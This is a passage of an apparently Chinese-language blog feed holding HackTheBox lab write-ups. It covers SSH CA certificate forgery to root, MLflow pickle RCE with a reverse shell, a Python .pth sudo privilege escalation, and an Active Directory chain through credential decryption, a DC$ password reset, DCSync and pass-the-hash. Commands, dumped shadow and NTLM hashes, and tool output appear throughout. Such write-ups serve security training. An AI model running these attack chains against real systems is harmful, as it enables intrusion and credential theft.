https://github.com/vedetta-com/vedetta/blob/master/src/usr/local/share/doc/vedetta/OpenSSH_Principals.md?ref=benheater.com#certificate-authority
:::</p>
<p>显示这就是 CA 签名密钥, 使用该密钥签名一个针对 root 的私钥:</p>
<pre><code>ssh-keygen -t ed25519 -f mykey.root
ssh-keygen -s ssh_cakey -I pwned -n root -V +1h mykey.root.pub
ssh -i mykey -o CertificateFile=mykey.root-cert.pub root@principal-corp.local
</code></pre>
<h1>R00t3d</h1>
<pre><code>root@principal:~# whoami
root
root@principal:~# id
uid=0(root) gid=(root) groups=0(root)
root@principal:~# ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:1b:e8 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.15.87/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2339sec preferred_lft 2339sec
root@principal:~# cat /etc/shadow
root:$y$j9T$xBgOh.jWzUeApicxtS7Qo0$J6.UrcvvOErkZUK/r2E4SZGKY2ltQ/ssABhF1SVMUoC:20518:0:99999:7:::
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="HTB-writeup"/>
  </entry>
  <entry>
    <title>smarthire-htb</title>
    <link href="https://0x5t4ckc47.github.io/posts/smarthire-htb/smarthire-htb/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/smarthire-htb/smarthire-htb/</id>
    <published>2026-08-03T00:00:00.000Z</published>
    <updated>2026-08-03T00:00:00.000Z</updated>
    <summary>HackTheBox SmartHire Medium</summary>
    <content type="html"><![CDATA[<h1>recon</h1>
<pre><code>22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 41:3c:e3:bb:88:70:99:7f:b8:96:59:48:9b:85:98:69 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLg1Y2xxe0euIHDjjKTIrxL+XZXgsBabs0FMAMKBL8arUuELui3vhlkgcDVGcZ4vFWnsiu4osw5INjfcQGkp2BY=
|   256 d5:9d:fd:6b:be:d8:39:6f:3f:43:ab:0e:f6:3e:22:db (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPc/kqsR+WxwGPMNTukcYPjzZRGjQL6N+0HsGIS1NV4U
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<h1>80 - Web</h1>
<h2>smarthire.htb</h2>
<p>访问 IP 重定向到 <code>smarthire.htb</code>, 添加 hosts.
<img src="smarthire-web.png" alt="Main Page" /></p>
<p>技术栈没有给出多少信息</p>
<pre><code>HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 01 Aug 2026 09:50:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie
Content-Length: 11255
</code></pre>
<p>有趣的是, 用户评价指出该平台集成了 Mlflow, 后者是一个是一个开源的 AI 工程平台, 适用于智能体、LLM 和模型
<img src="smarthire-web-testimonials.png" alt="User Comment" /></p>
<p>功能需要登陆, 注册一个账户并登陆, 一个 AI 模型训练的工作站:
<img src="smarthire-web01.png" alt="After Login" /></p>
<h2>models.smarthire.htb</h2>
<p>使用 ffuf 枚举, 这个子域名不在 <code>subdomains-top1million-5000.txt</code> 中. 猜测其为上文中提到的 MLFlow. 需要登陆, 尝试 mlflow 默认凭据 <code>admin:password</code>, 成功:</p>
<p>技术栈没有给出什么信息</p>
<pre><code>HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 01 Aug 2026 09:51:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Disposition: inline; filename=index.html
Last-Modified: Wed, 17 Sep 2025 13:39:07 GMT
Cache-Control: no-cache
ETag: W/"1758116347.0-645-3612482313"
Content-Length: 645
</code></pre>
<h3>CVE-2024-37054</h3>
<p>banner 指出版本为 <code>2.14.1</code>, 公开利用指向 <a href="https://github.com/ben-slates/CVE-2024-37054">CVE-2024-37054</a>:
:::quote
MLflow Tracking Server deserializes model artifacts via Python's <code>pickle</code> module when loading models for inference. An authenticated attacker can overwrite the <code>python_model.pkl</code> artifact in MLflow's artifact repository with a malicious pickle payload. When the model is subsequently loaded (e.g., during a prediction request), the payload is deserialized, executing arbitrary code on the server.
:::</p>
<p>Poc需要 app 和 mlflow server, 根据用户评价推测二者分别为 <code>smarthire.htb</code> 和 <code>models.smarthire.htb</code></p>
<pre><code>---
python3 ./poc.py
usage: poc.py [-h] [--mlflow-creds USER:PASS] [--app-username APP_USERNAME] [--app-password APP_PASSWORD] [--app-login-url APP_LOGIN_URL] [--upload-url UPLOAD_URL] [--predict-url PREDICT_URL]
              [--experiment-id EXPERIMENT_ID] [--delay SECONDS] [--cmd COMMAND] [--verbose] [--quiet] [--no-color]
              target mlflow lhost lport
poc.py: error: the following arguments are required: target, mlflow, lhost, lport
---
python3 poc.py   http://smarthire.htb http://models.smarthire.htb 10.10.16.174 4444 --app-username stackcat --app-password stackcat
</code></pre>
<p>得到 shell 连接</p>
<h1>svcweb2root</h1>
<p>对于机器上用户 尽管syslog 有 home, 但没有 shell, 暂时不考虑:</p>
<pre><code>---
(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ cat /etc/passwd|grep home
syslog:x:106:113::/home/syslog:/usr/sbin/nologin
svcweb:x:1000:1000:smarthire_user:/home/svcweb:/bin/bash
</code></pre>
<p>网络情况, 主机上无其余有趣端口, docker 套接字权限不足:</p>
<pre><code>---
(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ cat /etc/nginx/sites-enabled/smarthire
# smarthire main app
server {
    listen 80;
    server_name smarthire.htb;

    location / {
        proxy_pass http://127.0.0.1:8000;
...
server {
    listen 80;
    server_name models.smarthire.htb;

    location / {
        proxy_pass http://127.0.0.1:5000;
...

---
(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ ss -lntp
LISTEN  0       4096          127.0.0.1:36045          0.0.0.0:*
LISTEN  0       4096      127.0.0.53%lo:53             0.0.0.0:*
LISTEN  0       128             0.0.0.0:22             0.0.0.0:*
LISTEN  0       2048          127.0.0.1:8000           0.0.0.0:*      users:(("gunicorn",pid=1739,fd=5),("gunicorn",pid=1120,fd=5),("gunicorn",pid=1110,fd=5),("gunicorn",pid=1107,fd=5),("gunicorn",pid=1028,fd=5))
LISTEN  0       511             0.0.0.0:80             0.0.0.0:*
LISTEN  0       4096          127.0.0.1:5000           0.0.0.0:*
LISTEN  0       128                [::]:22                [::]:*
---
(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ curl  127.0.0.1:36045
404: Page Not Found
</code></pre>
<p>SUDO 有可无密码运行文件:</p>
<pre><code>(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ sudo -l
Matching Defaults entries for svcweb on smarthire:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User svcweb may run the following commands on smarthire:
    (root) NOPASSWD: /usr/bin/python3.10 /opt/tools/mlflow_ctl/mlflowctl.py *
</code></pre>
<h2>mlflowctl.py .pth injection</h2>
<pre><code>from pathlib import Path
import sys
import site

BASE_DIR = Path(__file__).resolve().parent
PLUGINS_DIR = BASE_DIR / "plugins"

# make plugins importable
for path in PLUGINS_DIR.iterdir():
    if path.is_dir():
        site.addsitedir(str(path))
...

def main():
    import mlflow_actions, backup_models
...

if __name__ == "__main__": main()
</code></pre>
<p>其会从 <code>/opt/tools/mlflow_ctl/plugins</code> 目录中的每个目录下加载模块, 即将其添加到 <code>sys.path</code> 末尾</p>
<p>:::important
模块加载是从 <code>sys.path</code> 开始进行索引, 模块覆盖在该条件下无法实现
:::
但 <code>site.addsitedir()</code> 同时会加载该目录下的 <code>.pth</code> 文件</p>
<p>:::quote
An executable line in a <code>.pth</code> file is run at every Python startup, regardless of whether a particular module is actually going to be used.
:::</p>
<p>:::quote
Starting with Python 3.5, lines in .pth files starting with “import” followed by a space or tab are executed. - https://dfir.ch/posts/publish_python_pth_extension/
:::</p>
<p>即可以在 <code>.pth</code> 中的 <code>import</code> 开头的行中放置载荷, 其会被执行:</p>
<pre><code>(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ cat &gt;&gt; superevil.pth &lt;&lt; 'eof'
&gt;import os;os.system("cp /bin/bash /tmp/stackcat");os.system("chmod +s /tmp/stackcat")
&gt;eof
</code></pre>
<pre><code>(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ sudo /usr/bin/python3.10 /opt/tools/mlflow_ctl/mlflowctl.py status
(remote) svcweb@smarthire:/opt/tools/mlflow_ctl/plugins/dev$ /tmp/stackcat -p
(remote) root@smarthire:/opt/tools/mlflow_ctl/plugins/dev#
</code></pre>
<h1>root3d</h1>
<pre><code>(remote) root@smarthire:/opt/tools/mlflow_ctl/plugins/dev# cat /etc/shadow
root:$y$j9T$aK2bbvaNoSx6f5u9MgO04.$hFnfmmpEYPf0TrFuI52M5e2F83LYJqobGDjrXNSg9J5:20348:0:99999:7::
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="HTB-writeup"/>
  </entry>
  <entry>
    <title>support-htb</title>
    <link href="https://0x5t4ckc47.github.io/posts/support-htb/support-htb/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/support-htb/support-htb/</id>
    <published>2026-08-03T00:00:00.000Z</published>
    <updated>2026-08-03T00:00:00.000Z</updated>
    <summary>HackTheBox support windows easy </summary>
    <content type="html"><![CDATA[<h1>Recon</h1>
<pre><code>PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
9389/tcp open  mc-nmf        syn-ack .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 29811/tcp): CLEAN (Timeout)
|   Check 2 (port 50166/tcp): CLEAN (Timeout)
|   Check 3 (port 10778/udp): CLEAN (Timeout)
|   Check 4 (port 46656/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2026-07-30T03:38:22
|_  start_date: N/A
|_clock-skew: -18s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
</code></pre>
<p>不知道为什么服务信息没有给出来, 整体上是标准的 DC 端口分布, 需要注意的是 smb 签名启用且强制.</p>
<h2>SMB</h2>
<p>尝试 <code>guest:</code> 登陆, 成功, 从 banner 看服务器版本为 <code>winserver2022</code></p>
<pre><code>nxc smb 10.129.19.76 -u guest -p '' --shares
SMB         10.129.19.76    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.76    445    DC               [+] support.htb\guest:
SMB         10.129.19.76    445    DC               [*] Enumerated shares
SMB         10.129.19.76    445    DC               Share           Permissions     Remark
SMB         10.129.19.76    445    DC               -----           -----------     ------
SMB         10.129.19.76    445    DC               ADMIN$                          Remote Admin
SMB         10.129.19.76    445    DC               C$                              Default share
SMB         10.129.19.76    445    DC               IPC$            READ            Remote IPC
SMB         10.129.19.76    445    DC               NETLOGON                        Logon server share
SMB         10.129.19.76    445    DC               support-tools   READ            support staff tools
SMB         10.129.19.76    445    DC               SYSVOL                          Logon server share
</code></pre>
<p>有一个非预期共享, 访问并下载共享中文件:</p>
<pre><code>smbclient.py support.htb/guest:''@10.129.19.76
Impacket (Exegol fork) v0.14.0.dev0+20260623.162750.a2296a07 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use support-tools
# ls
drw-rw-rw-          0  Thu Jul 21 01:01:06 2022 .
drw-rw-rw-          0  Sat May 28 19:18:25 2022 ..
-rw-rw-rw-    2880728  Sat May 28 19:19:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw-    5439245  Sat May 28 19:19:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw-    1273576  Sat May 28 19:20:06 2022 putty.exe
-rw-rw-rw-   48102161  Sat May 28 19:19:31 2022 SysinternalsSuite.zip
-rw-rw-rw-     277499  Thu Jul 21 01:01:07 2022 UserInfo.exe.zip
-rw-rw-rw-      79171  Sat May 28 19:20:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw-   44398000  Sat May 28 19:19:43 2022 WiresharkPortable64_3.6.5.paf.exe
</code></pre>
<p>根据时间戳判断 <code>UserInfo.exe.zip</code> 可能为特殊的程序, 同时其余分别为从互联网上下载的软件</p>
<h2>Ldap</h2>
<pre><code> ldapsearch -x -H ldap://10.129.19.76 -b "dc=support,dc=htb"
# extended LDIF
#
# LDAPv3
# base &lt;dc=support,dc=htb&gt; with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
</code></pre>
<p>LDAP 需要凭据</p>
<h2>DNS</h2>
<pre><code>dig any support.htb @dc.support.htb
; &lt;&lt;&gt;&gt; DiG 9.10.6 &lt;&lt;&gt;&gt; any support.htb @dc.support.htb
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 50036
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;support.htb.			IN	ANY

;; ANSWER SECTION:
support.htb.		600	IN	A	10.129.19.76
support.htb.		600	IN	A	10.129.230.181
support.htb.		3600	IN	NS	dc.support.htb.
support.htb.		3600	IN	SOA	dc.support.htb. hostmaster.support.htb. 117 900 600 86400 3600

;; ADDITIONAL SECTION:
dc.support.htb.		1200	IN	A	10.129.19.76

;; Query time: 146 msec
;; SERVER: 10.129.19.76#53(10.129.19.76)
;; WHEN: Mon Aug 03 22:14:21 CST 2026
;; MSG SIZE  rcvd: 152
</code></pre>
<p>没什么有趣的信息</p>
<h1>reverse UserInfo.exe</h1>
<p><code>UserInfo.exe.zip</code> 不需要凭据可以直接解压缩:</p>
<pre><code>ls -liah
total 1872
31236543 drwxr-xr-x  15 r3vert  staff   480B Jul 30 11:48 .
31229530 drwxr-xr-x  14 r3vert  staff   448B Jul 30 18:34 ..
31236552 -rw-rw-rw-   1 r3vert  staff    98K Mar  2  2022 CommandLineParser.dll
31236553 -rw-rw-rw-   1 r3vert  staff    22K Oct 23  2021 Microsoft.Bcl.AsyncInterfaces.dll
31236554 -rw-rw-rw-   1 r3vert  staff    46K Oct 23  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
31236555 -rw-rw-rw-   1 r3vert  staff    83K Oct 23  2021 Microsoft.Extensions.DependencyInjection.dll
31236556 -rw-rw-rw-   1 r3vert  staff    63K Oct 23  2021 Microsoft.Extensions.Logging.Abstractions.dll
31236557 -rw-rw-rw-   1 r3vert  staff    20K Feb 19  2020 System.Buffers.dll
31236558 -rw-rw-rw-   1 r3vert  staff   138K Feb 19  2020 System.Memory.dll
31236559 -rw-rw-rw-   1 r3vert  staff   113K May 15  2018 System.Numerics.Vectors.dll
31236560 -rw-rw-rw-   1 r3vert  staff    18K Oct 23  2021 System.Runtime.CompilerServices.Unsafe.dll
31236561 -rw-rw-rw-   1 r3vert  staff    25K Feb 19  2020 System.Threading.Tasks.Extensions.dll
31236551 -rwxrwxrwx   1 r3vert  staff    12K May 28  2022 UserInfo.exe
31236562 -rw-rw-rw-   1 r3vert  staff   563B May 28  2022 UserInfo.exe.config

file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
</code></pre>
<p>解压得到 <code>.NET</code> Windows PE 可执行文件, 没有神奇隐藏文件, 使用 <code>ILSPY</code> 反编译:
<img src="./userinfo_rev.png" alt="rev" /></p>
<p>程序使用 <code>ldap</code> 账户进行 Ldap 查询, 程序内硬编码了加密后的凭据, 凭据解密方式如下:</p>
<pre><code>internal class Protected
{
	private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
	private static byte[] key = Encoding.ASCII.GetBytes("armando");
	public static string getPassword()
	{
		byte[] array = Convert.FromBase64String(enc_password);
		byte[] array2 = array;
		for (int i = 0; i &lt; array.Length; i++)
		{
			array2[i] = (byte)(array[i] ^ key[i % key.Length] ^ 0xDF);
		}
		return Encoding.Default.GetString(array2);
	}
}
</code></pre>
<p>写一个 <code>python</code> 脚本解密:</p>
<pre><code>from base64 import b64decode
key = "armando"
enc = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
p = []
array = b64decode(enc)

for i in range(len(array)):
    t = array[i] ^ ord(key[i % len(key)]) ^ 0xDF
    p.append(chr(t))

print(''.join(p))
</code></pre>
<p>运行, 我们得到了一组凭据: <code>ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz</code></p>
<pre><code>python3 ./key_decode.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
</code></pre>
<h1>Act as ldap</h1>
<p>用户可以查询 LDAP, 先收集  Bloodhound 数据, 域内账户可创建机器配额数为 <code>10</code>, 是个好消息.</p>
<pre><code>rusthound-ce -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb --zip
---------------------------------------------------
Initializing RustHound-CE at 22:28:19 on 08/03/26
Powered by @g0h4n_0
---------------------------------------------------
...
[2026-08-03T14:28:56Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2026-08-03T14:28:56Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2026-08-03T14:28:56Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 21 users parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 1 ous parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 1 domains parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] 73 containers parsed!
[2026-08-03T14:28:56Z INFO  rusthound_ce::json::maker::common] .//20260803222856_support-htb_rusthound-ce.zip created!

RustHound-CE Enumeration Completed at 22:28:56 on 08/03/26! Happy Graphing!
</code></pre>
<p><img src="./path2domainadmin.png" alt="path2domainadmin" /></p>
<p>bloodhound 数据给出了一条通往 DomainAdmin 的路, 其中最佳切入点是 <code>support</code> 用户, 在 Ldap 中查询 <code>support</code> 用户:</p>
<pre><code>ldapsearch -x -H ldap://10.129.19.76 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(CN=support)"
...
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20260803142558.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
...
</code></pre>
<p>在 <code>info</code> 字段中有一串神奇字符, 猜测其为 <code>support</code> 账户密码</p>
<h1>Act as support</h1>
<p>凭据验证以及枚举:</p>
<pre><code>nxc smb support.htb -u support -p 'Ironside47pleasure40Watchful'
SMB         10.129.19.76    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.76    445    DC               [+] support.htb\support:Ironside47pleasure40Watchful

nxc winrm support.htb -u support -p 'Ironside47pleasure40Watchful'
WINRM       10.129.19.76    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM       10.129.19.76    5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

nxc ldap support.htb -u support -p 'Ironside47pleasure40Watchful'
LDAP        10.129.19.76    389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.19.76    389    DC               [+] support.htb\support:Ironside47pleasure40Watchful
</code></pre>
<h2>Act As DC$</h2>
<p>依据 bloodhound 结果, 最快途径为重置 <code>DC$</code> 密码并以 <code>DC$</code> 身份执行 <code>DCsync</code>:</p>
<pre><code>bloodyad -d support.htb -u support -p 'Ironside47pleasure40Watchful' -H support.htb set password 'DC$' '#stackcat123!'
[+] Password changed successfully!

nxc smb support.htb -u 'DC$' -p '#stackcat123!'
SMB         10.129.19.76    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.19.76    445    DC               [+] support.htb\DC$:#stackcat123!

secretsdump.py  support.htb/"DC$":'#stackcat123!'@10.129.19.76
Impacket (Exegol fork) v0.14.0.dev0+20260623.162750.a2296a07 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
</code></pre>
<h1>shell as Administrator</h1>
<pre><code>ewp -i 10.129.19.76 -u Administrator -H bb06cbc02b39abeddd1335bc30b19e26
          _ _            _
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to '10.129.19.76:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents&gt; whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
</code></pre>
<h1>Why not RBCD</h1>
<p>你或许会问为什么不用 <code>rbcd</code>, 在本机上结果如下:</p>
<pre><code>addcomputer.py support.htb/support:'Ironside47pleasure40Watchful' -computer-name rbcd -computer-pass '#stackcat123!'
Impacket (Exegol fork) v0.14.0.dev0+20260623.162750.a2296a07 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account rbcd$ with password #stackcat123!.

impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' -delegate-to 'DC$' -delegate-from 'rbcd$' -dc-ip 10.129.19.76 -action write -debug
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /Users/r3vert/.pyenv/versions/3.12.7/lib/python3.12/site-packages/impacket
[+] Initializing domainDumper()
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] rbcd$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     rbcd$        (S-1-5-21-1677581083-3380853377-188903654-6101)

impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.129.19.76   'support.htb/rbcd$:#stackcat123!'
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

export KRB5CCNAME=./Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

impacket-smbexec  -no-pass -k support.htb/Administrator@dc.support.htb  -debug
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /Users/r3vert/.pyenv/versions/3.12.7/lib/python3.12/site-packages/impacket
[+] StringBinding ncacn_np:dc.support.htb[\pipe\svcctl]
[+] Using Kerberos Cache: ./Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
[+] Returning cached credential for CIFS/DC.SUPPORT.HTB@SUPPORT.HTB
[+] Using TGS from cache
[-] SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
</code></pre>
<p>本地机器为 <code>Darwin r1ngz0ps.local 24.6.0 Darwin Kernel Version 24.6.0: Tue Apr 21 20:18:11 PDT 2026; root:xnu-11417.140.69.710.16~1/RELEASE_ARM64_T6020 arm64</code>, 如有遇到相关情况的师傅, 可以到 About 页面给出的群中找我, 万分感谢.</p>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="HTB-writeup"/>
  </entry>
</feed>
